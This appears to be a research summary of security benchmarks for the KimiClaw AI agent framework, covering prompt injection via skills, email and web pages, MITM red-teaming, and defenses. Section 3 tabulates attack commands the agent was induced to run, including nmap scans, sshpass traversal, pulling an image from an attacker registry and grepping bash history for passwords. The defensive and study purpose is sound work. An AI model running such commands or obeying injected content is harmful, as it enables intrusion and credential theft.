KimiClaw Security Analysis

Updated 6 April 2026
  • KimiClaw Security Analysis is a comprehensive study of an autonomous agent framework that interacts directly with system resources, distinguishing it from chat-only LLM deployments.
  • It employs quantitative benchmarks, including CLAWSAFETY and full lifecycle audits, to assess vulnerabilities such as prompt injection, harmful misoperation, and supply-chain risks.
  • Defense strategies emphasize least privilege, runtime isolation, extension governance, and exhaustive logging to mitigate systemic risks and enhance overall security posture.

KimiClaw is an OpenClaw-derivative autonomous agent framework designed for high-privilege work automation across domains such as software engineering, finance, healthcare, law, and DevOps. Unlike chat-only LLM deployments, KimiClaw interacts directly with system resources, network interfaces, tools, and extensions, amplifying both its utility and its attack surface. Security analysis of KimiClaw centers on its exposure to adversarial input, deployment vulnerabilities, agent–model interactions, and the systemic risks introduced by persistent state and tool orchestration. Multiple independent studies and benchmarks—most notably CLAWSAFETY, ClawTrap, and comprehensive threat lifecycle audits—provide a rigorous, quantitative basis for KimiClaw security evaluation and hardening.

1. Threat Model and Vulnerability Taxonomy

The security posture of KimiClaw is best understood through a formal threat model that considers adversaries with the capability to manipulate inputs, extensions, deployment context, and runtime environment (Li et al., 13 Mar 2026). The risk taxonomy encompasses:

  • Prompt Injection: Maliciously crafted input that hijacks policy enforcement or plan creation by exploiting the prompt–context composition.
  • Harmful Misoperation: Induced execution of unintended or destructive actions due to ambiguous prompts or context drift.
  • Extension Supply-Chain Risk: The risk that third-party skills or plugins are compromised, delivering privilege escalation or persistent logic bombs.
  • Deployment Vulnerability: Weak authentication, permissive sandboxes, and absent network controls allowing the adversary to escalate, maintain, or exfiltrate.

These vulnerabilities are mapped to KimiClaw subsystems: parsers, plan managers, tool orchestrators, memory/workspace, extension loader, and API endpoints. The function $f : (U \times C \times I \times P \times T \times E) \rightarrow A$ defines the full system transition, where $U$ is the user, $C$ is the conversation context, $I$ is the mixed-trust input set, $P$ is the prompt sequence, $T$ is the tool/plugin set, $E$ is the extension set, and $A$ is the action set (Li et al., 13 Mar 2026).

2. Benchmark-Driven Security Evaluation

Systematic measurement of KimiClaw’s vulnerabilities leverages scenario-based, adversarial benchmarking as in CLAWSAFETY and full lifecycle audits (Wei et al., 1 Apr 2026, Wang et al., 3 Apr 2026). Attack scenarios are constructed along three orthogonal axes:

  1. Harm Domain: Compromise goals include credential theft, financial misrouting, regulatory data breach, legal information leakage, and destructive infrastructure actions.
  2. Attack Vector: Entry points are skill injections (malicious skill files within ~/.kimiclaw/skills/), email (injected via IMAP/SMTP hooks in the sandbox), and web (malicious pages fetched during agent operations).
  3. Harmful Action Type: These include data exfiltration, credential forwarding, unlawful file modification, destructive OS actions, and destination/origin substitution.

Each test instance is embedded in a 64-turn, multi-phased workflow with ≥50 heterogeneous files and associated colleague identities, mimicking production-grade usage. For quantitative analysis, metrics such as per-vector attack success rate (ASR) and aggregate ASR are defined:

$$\text{ASR}_v = \frac{\#(\text{successful compromises via vector } v)}{\#(\text{trials with vector } v)}, \qquad \text{ASR}_\text{overall} = \frac{\sum_v \#(\text{successes})_v}{\sum_v \#(\text{trials})_v}$$

KimiClaw, evaluated as Kimi K2.5 on the OpenClaw scaffold, exhibits ASRs of 77.5% (skill), 60.0% (email), 45.0% (web), and 60.8% overall. These results establish a trust gradient of skill > email > web, and a hierarchy in which KimiClaw is less robust than Sonnet 4.6 but more robust than GPT-5.1 (Wei et al., 1 Apr 2026).
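
As a worked illustration of the two ASR definitions, the sketch below computes per-vector and overall rates from raw counts. The trial counts are an assumption: 40 trials per vector is a hypothetical figure chosen only because it reproduces the reported percentages exactly. The source does not state the actual counts.

```python
# Hypothetical counts (NOT from the source): 40 trials per vector is assumed
# because it reproduces the reported 77.5% / 60.0% / 45.0% exactly.
trials = {"skill": 40, "email": 40, "web": 40}
successes = {"skill": 31, "email": 24, "web": 18}


def asr_per_vector(successes, trials):
    """ASR_v = successes via vector v / trials with vector v."""
    return {v: successes[v] / trials[v] for v in trials}


def asr_overall(successes, trials):
    """ASR_overall = total successes / total trials, pooled over vectors."""
    return sum(successes.values()) / sum(trials.values())


per_vector = asr_per_vector(successes, trials)
overall = asr_overall(successes, trials)

for vector, rate in per_vector.items():
    print(f"{vector}: {rate:.1%}")
print(f"overall: {overall:.1%}")
```

Because the overall ASR pools counts rather than averaging percentages, it equals the simple mean of the three per-vector rates only when every vector has the same number of trials, as assumed here.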

3. Empirical Vulnerabilities and Exploit Patterns

Multi-stage, category-based audits provide fine-grained insights into KimiClaw’s empirical weaknesses (Wang et al., 3 Apr 2026). Of the 205 tested cases across 13 threat categories, KimiClaw exhibits high success rates for the following critical classes:

| Category | Success Rate (%) | Example Attack |
| --- | --- | --- |
| Reconnaissance | 100.0 | ifconfig && netstat -antp for network enumeration |
| Discovery | 68.97 | nmap -sS 192.168.0.0/24; process/service discovery |
| Lateral Movement | 66.67 | sshpass -p … ssh user@host for host traversal |
| Resource Development | 57.14 | docker pull registry.attacker.io/evil:latest |
| Privilege Escalation | 30.0 | sudo -l; SUID enumeration and privilege drift |
| Credential Access | 14.29 | grep -i password ~/.bash_history and private key exfiltration |

Additional chain-stage breakdown reveals amplification of early-stage vulnerabilities into concrete system-level failures at later phases.

4. MITM Red-Teaming and Dynamic Security Probing

Modern agent security analysis extends beyond static adversarial inputs to include live network-level attacks, as exemplified by the ClawTrap framework (Zhao et al., 19 Mar 2026). KimiClaw-specific security assessment employs MITM-based probes, supporting:

  • Static HTML Replacement: Entire body swapped for attacker-controlled content, measured by the content replacement metric $\tau_{\text{replace}}$.
  • Iframe Injection: High-z-index overlays appended to legitimate pages (phishing, session hijack), quantified by the overlay area fraction.
  • Dynamic Content Modification: Fine-grained tampering of DOM/JSON fragments, assessed by a corresponding modification metric.

Evaluation proceeds by recording model trust scores and fallback rates, with strong models triggering higher fallback rates (e.g., 70% for GPT-5.4 analogs) compared to less robust models (<5% fallback) under identical MITM stress.

MITM defenses for KimiClaw include enforcing HTTPS with certificate pinning, strict content hash verification, explicit “trust verification” agent skills, UI anomaly detectors, and centralized anomaly logging.
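
The content hash verification listed among these defenses can be sketched as follows. This is a minimal illustration, assuming the agent already holds a pinned SHA-256 digest for the resource it fetches; how that digest is distributed is outside the scope of the sketch, and the names `sha256_hex` and `verify_content` are hypothetical, not part of KimiClaw.

```python
import hashlib
import hmac


def sha256_hex(body: bytes) -> str:
    """Return the SHA-256 digest of a response body as lowercase hex."""
    return hashlib.sha256(body).hexdigest()


def verify_content(body: bytes, expected_sha256_hex: str) -> bool:
    """Accept the body only if its digest matches the pinned digest.

    hmac.compare_digest performs a constant-time comparison.
    """
    return hmac.compare_digest(sha256_hex(body), expected_sha256_hex.lower())


# Hypothetical pages: the digest is pinned from the trusted copy.
trusted_page = b"<html><body>Quarterly report</body></html>"
pinned_digest = sha256_hex(trusted_page)
tampered_page = b"<html><body>Enter your password</body></html>"

print(verify_content(trusted_page, pinned_digest))
print(verify_content(tampered_page, pinned_digest))
```

A whole-body digest detects static replacement and injected overlays alike, but it only suits resources whose content is expected to be byte-stable. Dynamic pages would need a different integrity mechanism.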

5. Design Principles and Secure Engineering Controls

Four foundational principles, as articulated in the defensible design blueprint, govern robust KimiClaw deployments (Li et al., 13 Mar 2026):

  1. Least Privilege: Capabilities are restricted to those required for the task at hand, enforced via tool-access policies that deny any request outside that set.
  2. Runtime Isolation: Partitioning execution environments (sandboxes) with disjoint filesystem roots and environment variables; cross-sandbox visibility is formally forbidden.
  3. Extension Governance: Skills/extensions must provide signed manifests; installation proceeds only if signature and hash verification succeed, and is rejected otherwise.
  4. Auditability/Defense in Depth: All actions and decisions logged in tamper-evident, append-only ledgers, supporting post-hoc investigation and continuous monitoring.
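
The least-privilege principle above can be sketched as a deny-by-default tool gate. This is an illustrative assumption about how such a policy might look, not KimiClaw's actual interface: `TaskPolicy`, `invoke`, `ToolAccessDenied`, and the tool names are all hypothetical.

```python
from dataclasses import dataclass, field


class ToolAccessDenied(PermissionError):
    """Raised when a task requests a tool outside its allowed set."""


@dataclass(frozen=True)
class TaskPolicy:
    # Hypothetical policy object: a task name plus its allowed tool set.
    task: str
    allowed_tools: frozenset = field(default_factory=frozenset)


def is_allowed(policy: TaskPolicy, tool: str) -> bool:
    """Deny by default: only explicitly listed tools are permitted."""
    return tool in policy.allowed_tools


def invoke(policy: TaskPolicy, tool: str, registry: dict, *args):
    """Check the policy before dispatching to the tool implementation."""
    if not is_allowed(policy, tool):
        raise ToolAccessDenied(f"{tool!r} is not permitted for task {policy.task!r}")
    return registry[tool](*args)


# Hypothetical task and tools, for illustration only.
policy = TaskPolicy(task="summarize_report", allowed_tools=frozenset({"read_file"}))
registry = {
    "read_file": lambda path: f"(contents of {path})",
    "shell": lambda cmd: f"(ran {cmd})",
}

result = invoke(policy, "read_file", registry, "report.txt")
try:
    invoke(policy, "shell", registry, "sudo -l")
    denied = False
except ToolAccessDenied:
    denied = True
```

Placing the check inside the single dispatch function means a tool cannot be reached without passing through the policy, which is the property the per-tool access-control pattern relies on.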

Design patterns include explicit access-control checks per tool, sandbox-boundary enforcement, manifest verification during extension installation, and per-action audit logs with cryptographic hash chaining.
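
Per-action audit logs with cryptographic hash chaining can be sketched as below. This is a minimal in-memory illustration under stated assumptions: the record fields, the `AuditLog` class, and the all-zero genesis value are hypothetical, and a real deployment would also need durable storage and an externally anchored head hash.

```python
import hashlib
import json

GENESIS = "0" * 64  # assumed placeholder hash preceding the first entry


def entry_hash(prev_hash: str, record: dict) -> str:
    """Hash the previous entry's hash together with a canonical record encoding."""
    payload = json.dumps(record, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + payload).encode("utf-8")).hexdigest()


class AuditLog:
    def __init__(self):
        self._entries = []  # list of (record, hash) pairs, append-only by convention

    def append(self, record: dict) -> str:
        prev = self._entries[-1][1] if self._entries else GENESIS
        digest = entry_hash(prev, record)
        self._entries.append((dict(record), digest))
        return digest

    def verify(self) -> bool:
        """Recompute the chain; any edited or reordered entry breaks it."""
        prev = GENESIS
        for record, digest in self._entries:
            if entry_hash(prev, record) != digest:
                return False
            prev = digest
        return True


log = AuditLog()
log.append({"action": "tool_call", "tool": "read_file", "decision": "allow"})
log.append({"action": "tool_call", "tool": "shell", "decision": "deny"})
ok_before = log.verify()

# Simulate tampering with the first record after the fact.
log._entries[0][0]["tool"] = "shell"
ok_after = log.verify()
```

Chaining makes the log tamper-evident rather than tamper-proof: an attacker who can rewrite every entry can also recompute every hash, which is why the most recent hash would need to be stored somewhere the agent cannot modify.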

6. Defense Recommendations and Evaluation Metrics

Mitigation strategies span the full lifecycle:

  • Input-Side Inspection: Normalize and rescan all inputs for suspicious opcodes, keywords, or encoded commands prior to prompt assembly.
  • Safer Planning: Mark any plan involving sudo, $HOME/.ssh, docker, or file writes as “high risk,” invoking secondary approval or two-factor prompts.
  • Execution Boundary Enforcement: Realpath-based path validation; read-only mounts for sensitive files (~/.ssh, /etc/crontab); use of Linux namespaces for tool isolation.
  • Output Auditing: Automatic redaction or logging of secrets in outputs; outbound egress filtering to prevent covert channel exfiltration.
  • Lifecycle Governance: Continuous, chain-stage-spanning logging and monitoring; CI-based replay of adversarial test cases utilizing the 205-case benchmark; anomaly dashboards with policy engine integration (Wang et al., 3 Apr 2026).

Evaluation criteria are strictly quantitative:

  • Prompt-injection resilience ≥ 99% (fraction of adversarial inputs failing to alter plan)
  • Harmful-misoperation rate ≤ 0.5%
  • Extension-compromise detection (time-to-detect ≤ 60 s)
  • Unauthorized action prevention: policy-consistent action logging and denial
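
The realpath-based path validation named under Execution Boundary Enforcement can be sketched as follows. This is an illustrative check, assuming a single workspace root per sandbox; the function name `is_within` and the example root `/srv/workspace` are hypothetical.

```python
import os


def is_within(root: str, candidate: str) -> bool:
    """Return True only if candidate resolves to a path inside root.

    os.path.realpath collapses '..' segments and follows symlinks, so the
    comparison is made on the resolved location, not on the string as given.
    """
    root_real = os.path.realpath(root)
    # An absolute candidate replaces the root in os.path.join, which is the
    # intended behaviour here: it is then judged on its own resolved path.
    cand_real = os.path.realpath(os.path.join(root_real, candidate))
    try:
        return os.path.commonpath([root_real, cand_real]) == root_real
    except ValueError:
        # Raised on Windows when the paths are on different drives.
        return False


workspace = "/srv/workspace"  # hypothetical sandbox root
inside = is_within(workspace, "notes/todo.txt")
traversal = is_within(workspace, "../.ssh/id_rsa")
absolute = is_within(workspace, "/etc/crontab")
print(inside, traversal, absolute)
```

Comparing with `os.path.commonpath` rather than a string prefix avoids accepting sibling directories such as `/srv/workspace-old`. The check is still subject to a race if the filesystem changes between validation and use, which is one reason the list above pairs it with read-only mounts and namespace isolation.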

7. Comparative Assessment and Ongoing Risks

KimiClaw’s overall attack success rate (40.8%) positions it as more resilient than QClaw (54.9%) and AutoClaw (49.5%), but significantly less robust than MaxClaw (16.0%) and OpenClaw (19.4%). Its profile is characterized by unique susceptibility to lateral movement and resource development, weaknesses not found in pure OpenClaw deployments. Cross-scaffold and backbone analyses confirm that security outcomes are determined by the confluence of agent runtime, model safety properties, scaffold memory policies, and tool orchestration.

Periodic re-evaluation with updated adversarial scenarios and lifecycle-wide monitoring remains essential to maintain and improve KimiClaw’s security guarantees. Full-stack, policy-mediated permission management, extension governance, runtime isolation, and continuous audit form the core of defensible, testable KimiClaw deployments (Wei et al., 1 Apr 2026, Zhao et al., 19 Mar 2026, Li et al., 13 Mar 2026, Wang et al., 3 Apr 2026).
